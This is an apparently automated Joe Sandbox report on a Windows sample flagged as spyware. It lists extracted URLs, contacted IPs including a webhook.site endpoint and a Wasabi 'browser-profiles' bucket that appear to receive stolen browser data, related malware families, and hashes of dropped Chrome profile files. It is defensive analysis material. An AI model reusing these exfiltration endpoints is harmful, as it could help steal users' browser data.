        https://duckduckgo.com/ac/?q=file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://mail.google.com/mail/installwebapp?usp=chrome_defaultfile.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/Jfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/Jfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/drive/installwebapp?usp=chrome_defaultfile.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5;file.exe, 00000002.00000002.1500245617.000000C00053E000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/:file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        http://s3.amazonaws.com/doc/2006-03-01/file.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://s3.amazonaws.com/doc/2006-03-01/Thefile.exe, 00000002.00000002.1500245617.000000C0004F2000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • URL Reputation: safe
        		unknown
        https://mail.google.com/mail/:file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/installwebapp?usp=chrome_defaultfile.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.com/webstore?hl=enTop Sites.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://sandbox.google.com/payments/v4/js/integrator.jsfile.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/:file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/installwebapp?usp=chrome_defaultfile.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/:file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.com/webstore?hl=enWebTop Sites.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/spreadsheets/Jfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.google.comNetwork Persistent State.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/spreadsheets/?usp=installed_webappfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://mail.google.com/mail/Jfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.comNetwork Persistent State.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • URL Reputation: safe
        		unknown
        https://docs.google.com/spreadsheets/:file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/?lfhs=2file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/s/notifications/manifest/cr_install.htmlfile.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/?feature=ytcafile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.youtube.com/Jfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/:file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.com/webstorefile.exe, 00000002.00000002.1500245617.000000C000509000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8Cfile.exe, 00000002.00000002.1500245617.000000C000414000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1500245617.000000C00040A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1496286874.000000C0003EE000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1496286874.000000C00019E000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://payments.google.com/payments/v4/js/integrator.jsfile.exe, 00000002.00000002.1500245617.000000C0004CD000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://chrome.google.com/file.exe, 00000002.00000002.1500245617.000000C00051C000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://drive.google.com/Jfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.ecosia.org/newtab/file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • URL Reputation: safe
        		unknown
        https://ac.ecosia.org/autocomplete?q=file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • URL Reputation: safe
        		unknown
        http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/2024file.exe, 00000002.00000002.1496286874.000000C0003C6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultfile.exe, 00000002.00000002.1500245617.000000C0004C3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://csp.withgoogle.com/csp/report-to/chromewebstoreReporting and NEL.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240820122501-19882742-CC56-1A59-97file.exe, 00000002.00000002.1496286874.000000C0003C6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/presentation/?usp=installed_webappfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd0file.exe, 00000002.00000002.1496286874.000000C0003C6000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://clients2.googleusercontent.comNetwork Persistent State.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.google.com/document/?usp=installed_webappfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • URL Reputation: safe
        		unknown
        https://csp.withgoogle.com/csp/report-to/gws/noneReporting and NEL.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.google.com/file.exe, 00000002.00000002.1500245617.000000C000509000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        46.4.105.116
        		unknownGermany
        		24940HETZNER-ASDEfalse
        154.18.200.103
        		ap-southeast-1.wasabisys.comUnited States
        		38701PIRANHA-AS-KRPiranhaSystemsKRfalse
        178.63.67.106
        		webhook.siteGermany
        		24940HETZNER-ASDEfalse

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1495966
        Start date and time:2024-08-20 18:23:55 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 57s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:20
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file.exe
        Detection:MAL
        Classification:mal60.spyw.evad.mine.winEXE@1/84@3/3
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 15
        • Number of non-executed functions: 36
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: file.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        12:24:52API Interceptor1x Sleep call for process: file.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        46.4.105.1164Vp6Xc8SFr.exeGet hashmaliciousUnknownBrowse

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          webhook.site4Vp6Xc8SFr.exeGet hashmaliciousUnknownBrowse
          • 46.4.105.116

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          HETZNER-ASDESecuriteInfo.com.Win32.Malware-gen.12816.24626.exeGet hashmaliciousVidarBrowse
          • 195.201.118.191
          SecuriteInfo.com.Trojan.PWS.Steam.37514.11423.27382.exeGet hashmaliciousVidarBrowse
          • 195.201.118.191
          SecuriteInfo.com.W32.ABRisk.JZOD-0687.30425.1987.exeGet hashmaliciousVidarBrowse
          • 195.201.118.191
          ExeFile (333).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (349).exeGet hashmaliciousEmotetBrowse
          • 116.202.23.3
          ExeFile (369).exeGet hashmaliciousEmotetBrowse
          • 116.202.23.3
          ExeFile (377).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (388).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (39).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (64).exeGet hashmaliciousEmotetBrowse
          • 116.202.10.123
          HETZNER-ASDESecuriteInfo.com.Win32.Malware-gen.12816.24626.exeGet hashmaliciousVidarBrowse
          • 195.201.118.191
          SecuriteInfo.com.Trojan.PWS.Steam.37514.11423.27382.exeGet hashmaliciousVidarBrowse
          • 195.201.118.191
          SecuriteInfo.com.W32.ABRisk.JZOD-0687.30425.1987.exeGet hashmaliciousVidarBrowse
          • 195.201.118.191
          ExeFile (333).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (349).exeGet hashmaliciousEmotetBrowse
          • 116.202.23.3
          ExeFile (369).exeGet hashmaliciousEmotetBrowse
          • 116.202.23.3
          ExeFile (377).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (388).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (39).exeGet hashmaliciousEmotetBrowse
          • 195.201.56.70
          ExeFile (64).exeGet hashmaliciousEmotetBrowse
          • 116.202.10.123
          PIRANHA-AS-KRPiranhaSystemsKR154.216.17.9-skid.m68k-2024-08-04T06_23_08.elfGet hashmaliciousMirai, MoobotBrowse
          • 101.250.29.148
          AAMwAy8pB7.elfGet hashmaliciousMirai, MoobotBrowse
          • 14.206.54.211
          RDEHNTKF1V.elfGet hashmaliciousMirai, MoobotBrowse
          • 182.163.212.248
          ysEZTOz202.elfGet hashmaliciousMiraiBrowse
          • 112.213.7.31
          dZcVvCQn9I.elfGet hashmaliciousMiraiBrowse
          • 101.250.29.141
          YnO77q8WhV.elfGet hashmaliciousUnknownBrowse
          • 154.18.217.41
          xDqMW4J6W3.elfGet hashmaliciousUnknownBrowse
          • 122.49.121.182
          57O67GbOCj.elfGet hashmaliciousMiraiBrowse
          • 112.213.7.51
          SoqyJuUVvW.elfGet hashmaliciousMiraiBrowse
          • 114.141.240.236
          nY3jvpEUvw.elfGet hashmaliciousMiraiBrowse
          • 112.213.7.15

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Affiliation Database

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 5
          Category:dropped
          Size (bytes):45056
          Entropy (8bit):0.40014189446483467
          Encrypted:false
          SSDEEP:24:TLz3blvGgOg53yS0lNvN2HLvKroyr0n4BmhltoVOq6Uwcc05fBGQwQ:TNxiSdLS0aVOlU1coB
          MD5:00AF4A50B4E83413600C40BE126B17B1
          SHA1:D6C2AAC58F581C4EA3B45C997A922DD99B2396CD
          SHA-256:95A77058925FC8DC392E2A4CF51D60EE41FFA49967A6E3BD4F34EFE3F0473E0E
          SHA-512:8B95EE2EFCA34EFE82A7E53E3C9EF68B481F174A5545C6A0AF9BB104AB43EF9554E2FB439522D4308886A8B04C9BC912472E82AF1E0964A5CA89906F0C646A02
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:SQLite format 3......@ ..........................................................................j..........g.....e...$.y.....Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsSiteData

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):28672
          Entropy (8bit):0.43798896343124133
          Encrypted:false
          SSDEEP:12:TLiqiQ5xT5SmKT5Si8wT5SislpXUUfzBW8ybwaW2b8wAs76uvsUkHZ6HFxOUwa52:TLiK5byqkiXBzlRr6hkc6UwccI5fBG
          MD5:7DCE97F609ECB4E2FA1F10D6594B362D
          SHA1:D78E2B7CFD27CEEBA4232752198D0561187E996A
          SHA-256:DBB0DAFF05CC9D3E3D524CE2C13913A0C7A193EF0A81254731DEF5623D2A8A31
          SHA-512:93B09E49BC25E7671471DA4002325F2EAB900B07C66F4CA142EA7A0A34009F6ACBB7C089EAE5056EAA5700F3E474205096D03DA14F4A8E3F1233647573212FAF
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:SQLite format 3......@ ..........................................................................j..........g.......o..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsState

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):414
          Entropy (8bit):5.062860331602711
          Encrypted:false
          SSDEEP:12:1HAgdRN6m5V+zW1+F6sKaxVRpghEkEIcN8zUujN6v:1H/Nv+y1BxaxVRpghEFIcN8j2
          MD5:97D0408A14EAC6028DE0776DDA8EEDDE
          SHA1:5AD8D77FB52F9BAAAF763D4A8AB43391F2D227F7
          SHA-256:D99D88143560FDDE72F0B9C69C07A4F3B66D8BF81D5E34BC814CDED7B377AC9E
          SHA-512:89143BA3BD26D13BCA56B61B87304707FB0DD5D0A3B6A45845708CC7F8F3AA0F3F220C2E35C1C451DD684D442A338D597E704E25DD5D226DCBBE0B47F1D91783
          Malicious:false
          Reputation:low
          Preview:{.. "epochs": [ {.. "calculation_time": "13340965313745074",.. "config_version": 0,.. "model_version": "0",.. "padded_top_topics_start_index": 0,.. "taxonomy_version": 0,.. "top_topics_and_observing_domains": [ ].. } ],.. "hex_encoded_hmac_key": "CD07BB1567FC202F2EFB1E5BB273023EC8EEF9A1400AF8A7E9DF17EF86D32C19",.. "next_scheduled_calculation_time": "13341570113745131"..}..

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\DIPS

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):28672
          Entropy (8bit):0.43508159006069336
          Encrypted:false
          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
          MD5:F5237AED0F897E7619A94843845A3EC3
          SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
          SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
          SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Cookies

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.5712781801655107
          Encrypted:false
          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
          MD5:05A60B4620923FD5D53B9204391452AF
          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\000003.log

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):152
          Entropy (8bit):1.8784775129881184
          Encrypted:false
          SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCT
          MD5:5649E96DCAC327DDE1B450B1C06A27D3
          SHA1:7AA5F9FB94F95F5977AE9BFA7A4957724FD66F19
          SHA-256:FBCBAF8740CB027FF6A147C013B6745071CF2A1FDE4450AB2A7A04FBC401F0C9
          SHA-512:0BF8D7E6582330D8C362C85EE0688F2A38D3768ECD6DDB9277EFFAA718B2B6C7FD82F665CECCEFD164C2921FE4EB30C43DFB7A3AB3A8FA4496E5B8F3F8DF10C3
          Malicious:false
          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\CURRENT

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.2743974703476995
          Encrypted:false
          SSDEEP:3:1sjgWIV//Uv:1qIFUv
          MD5:46295CAC801E5D4857D09837238A6394
          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
          Malicious:false
          Preview:MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\LOG

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):328
          Entropy (8bit):5.2096265739201755
          Encrypted:false
          SSDEEP:6:kubekL+q2PcNwi23iKKdK8aPrqIFUtjbeyKWZmwxbekLVkwOcNwi23iKKdK8amLJ:kubj+vLZ5KkL3FUtjb5KW/xbjV54Z5KV
          MD5:236591A25BC59248EA36B890069A49CE
          SHA1:F12787028A40F10251BFE4E43FBDF8E49A837694
          SHA-256:E5A746BE1DB58975FD9386FA12A63A212F93C499B82700A3FD5F2B950964E0BC
          SHA-512:176F01BE99766A185A86796F9984E1A84529B95FCA465A23C13A19FE1BAE225ACF10B09ECBFBDFCFD575BEA4F9333E6B4152992237756DCC2F07BA14D0C25F16
          Malicious:false
          Preview:2023/10/05-08:42:23.686 25ec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2023/10/05-08:42:23.686 25ec Recovering log #3.2023/10/05-08:42:23.686 25ec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\LOG.old

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):328
          Entropy (8bit):5.229793329677182
          Encrypted:false
          SSDEEP:6:kuWgq2PcNwi23iKKdK8aPrqIFUtjWBZmwxWbkwOcNwi23iKKdK8amLJ:kuhvLZ5KkL3FUtjc/xc54Z5KkQJ
          MD5:79D500A5677A8743FA890FFF62A98A7D
          SHA1:FA56DADB710D320DD730B48E749AF7AB22DBF08E
          SHA-256:6CA5FE0113C6073086A3655CFD78E0DD7910A96E852D8D8CB962E8BAD453FD01
          SHA-512:F7E9CB728988BA9E9EBDFF8D4D05CA6D7DEB9776951AA680646C20FA6582F9421F1530E40962F6BFA752C89BA82B2A178774381E0F054B53D637C644B9B0D31E
          Malicious:false
          Preview:2023/10/05-08:41:58.660 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2023/10/05-08:41:58.660 1db0 Recovering log #3.2023/10/05-08:41:58.660 1db0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\MANIFEST-000001

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Secret Key
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.704993772857998
          Encrypted:false
          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
          Malicious:false
          Preview:.|.."....leveldb.BytewiseComparator......

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\000003.log

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):152
          Entropy (8bit):1.8784775129881184
          Encrypted:false
          SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCT
          MD5:5649E96DCAC327DDE1B450B1C06A27D3
          SHA1:7AA5F9FB94F95F5977AE9BFA7A4957724FD66F19
          SHA-256:FBCBAF8740CB027FF6A147C013B6745071CF2A1FDE4450AB2A7A04FBC401F0C9
          SHA-512:0BF8D7E6582330D8C362C85EE0688F2A38D3768ECD6DDB9277EFFAA718B2B6C7FD82F665CECCEFD164C2921FE4EB30C43DFB7A3AB3A8FA4496E5B8F3F8DF10C3
          Malicious:false
          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\CURRENT

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.2743974703476995
          Encrypted:false
          SSDEEP:3:1sjgWIV//Uv:1qIFUv
          MD5:46295CAC801E5D4857D09837238A6394
          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
          Malicious:false
          Preview:MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\LOG

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):332
          Entropy (8bit):5.238579061162395
          Encrypted:false
          SSDEEP:6:kubeKL+q2PcNwi23iKKdK865IFUtjbeB1KWZmwxbeBjLVkwOcNwi23iKKdK86+Ud:kub1+vLZ5Kk/WFUtjboKW/xbiV54Z5Ky
          MD5:85D53699C673C895FCECE879652E88FD
          SHA1:3DF2521346C27AE115E7BF5DEC9591E09F8065AF
          SHA-256:A2B8DAB56D03C56EFC60142E893F186F043F155FED9087B43FE11828F4BEA05D
          SHA-512:2343A48DADA4192A81DF35E13A84B12F94A4B3ED11F9DD6081F66DF0711D44CB731EF864F9D759D04C13C9BDC16A7197B78A2455477B512B5631C1BFAA55839D
          Malicious:false
